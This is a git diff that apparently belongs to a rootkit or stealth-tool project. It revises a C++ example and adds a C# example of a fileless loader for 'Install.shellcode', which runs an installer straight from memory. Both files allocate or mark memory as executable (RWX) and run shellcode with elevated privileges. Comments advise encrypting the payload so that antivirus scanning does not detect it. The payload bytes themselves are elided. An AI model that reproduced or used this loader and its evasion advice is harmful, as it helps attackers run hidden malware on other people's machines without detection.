diff --git a/Docs/Documentation.docx b/Docs/Documentation.docx
index 0c12127..af16a47 100644
Binary files a/Docs/Documentation.docx and b/Docs/Documentation.docx differ
diff --git a/Examples/InstallShellCode.cpp b/Examples/InstallShellCode.cpp
index c57b37d..2095b06 100644
--- a/Examples/InstallShellCode.cpp
+++ b/Examples/InstallShellCode.cpp
@@ -2,22 +2,24 @@ // Example on how to use Install.shellcode
-// Install.shellcode wraps up Install.exe in a way that it can be loaded and executed as shellcode
+// Install.shellcode wraps up Install.exe in a way that it can be loaded and executed as shellcode.
 int main()
 {
+ // --- Elevated privileges required ---
+ // 1. Load Install.shellcode from resources or from a BYTE[]
- // Ideally, encrypt the file and decrypt it here to avoid scantime detection
+ // Ideally, encrypt the file and decrypt it here to avoid scantime detection.
 LPBYTE shellCode = ...
- // 2. Make the shellcode RWX
+ // 2. Make the shellcode RWX.
 DWORD oldProtect;
 VirtualProtect(shellCode, shellCodeSize, PAGE_EXECUTE_READWRITE, &oldProtect);
- // 3. Cast the buffer to a function pointer and execute it
+ // 3. Cast the buffer to a function pointer and execute it.
 ((void(*)())shellCode)();
- // This is the fileless equivalent to executing Install.exe
+ // This is the fileless equivalent to executing Install.exe.
 return 0;
 }
\ No newline at end of file
diff --git a/Examples/InstallShellCode.cs b/Examples/InstallShellCode.cs
new file mode 100644
index 0000000..d273f47
--- /dev/null
+++ b/Examples/InstallShellCode.cs
@@ -0,0 +1,35 @@
+using System;
+using System.Runtime.InteropServices;
+
+// Example on how to use Install.shellcode
+
+// Install.shellcode wraps up Install.exe in a way that it can be loaded and executed as shellcode.
+
+public static class Program
+{
+ public static void Main()
+ {
+ // --- Elevated privileges required ---
+
+ // 1. Load Install.shellcode from resources or from a byte[]
+ // Ideally, encrypt the file and decrypt it here to avoid scantime detection.
+ byte[] shellCode = ...
+
+ // 2. Create an RWX buffer with the shellcode.
+ IntPtr buffer = VirtualAlloc(IntPtr.Zero, (IntPtr)shellCode.Length, 0x1000, 0x40);
+ Marshal.Copy(shellCode, 0, buffer, shellCode.Length);
+
+ // 3. Start the shellcode in a thread and wait until it terminated.
+ IntPtr thread = CreateThread(IntPtr.Zero, 0, buffer, IntPtr.Zero, 0, out _);
+ WaitForSingleObject(thread, 0xffffffff);
+
+ // This is the fileless equivalent to executing Install.exe.
+ }
+
+ [DllImport("kernel32.dll")]
+ private static extern IntPtr VirtualAlloc(IntPtr address, IntPtr size, int allocationType, int protect);
+ [DllImport("kernel32.dll")]
+ private static extern IntPtr CreateThread(IntPtr threadAttributes, uint stackSize, IntPtr startAddress, IntPtr parameter, uint creationFlags, out uint threadId);
+ [DllImport("kernel32.dll")]
+ private static extern uint WaitForSingleObject(IntPtr handle, uint milliseconds);
+}
\ No newline at end of file